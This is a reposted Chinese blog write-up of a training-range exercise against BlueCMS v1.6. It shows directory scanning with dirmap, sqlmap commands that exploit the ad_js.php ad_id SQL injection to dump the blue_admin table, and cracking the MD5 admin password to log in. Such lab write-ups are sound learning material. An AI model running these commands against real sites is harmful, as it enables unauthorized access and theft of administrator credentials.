当前位置:   article > 正文

BlueCMS漏洞,靶场学习心得(上)_bluecms 模板漏洞

bluecms 模板漏洞

1.点击传送门进入网站,使用dirmap对网站做目录遍历,找到网站后台。

2.找到后台以后,下一步的思路是获取管理员账号密码。通过观察网站页面可知使用的是BlueCMS v1.6,我也是第一次接触,好像是个网站支撑的东西,百度了一下发现是一个比较老的源码开放的框架,试着搜了一下发现网上很多复现漏洞的文章,据此得到网站存在注入的页面。

 

3.试着用sqlmap跑一下数据库的表单,

sqlmap.py -u “rhiq8003.ia.aqlab.cn/bluecms/uploads/ad_js.php?ad_id=1” –dbs

 

4.表单跑出来以后,看着跟网站有关的就是blue_test,获取一下表里的tables,

sqlmap.py -u “rhiq8003.ia.aqlab.cn/bluecms/uploads/ad_js.php?ad_id=1” –D blue_test --tables

5.获取以后发现blue_admin和blue_admin_log,log的应该是日志记录,那么试着看一下blue_admin里面的内容。

sqlmap.py -u “rhiq8003.ia.aqlab.cn/bluecms/uploads/ad_js.php?ad_id=1” –D blue_test -T blue_admin --dump

 6.成功获取到具体字段,得到用户名为admin,密码是md5加密(密码就不放了,大家自己动手做一下就出来了)上网搜一下MD5的解密,推荐网站:MD5解密-BeJSON.com(推荐理由是很多网站都说这条加密是付费的),通过网站解密拿到admin账户的密码。

7.成功登录

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/花生_TL007/article/detail/543579
推荐阅读
相关标签
  

闽ICP备14008679号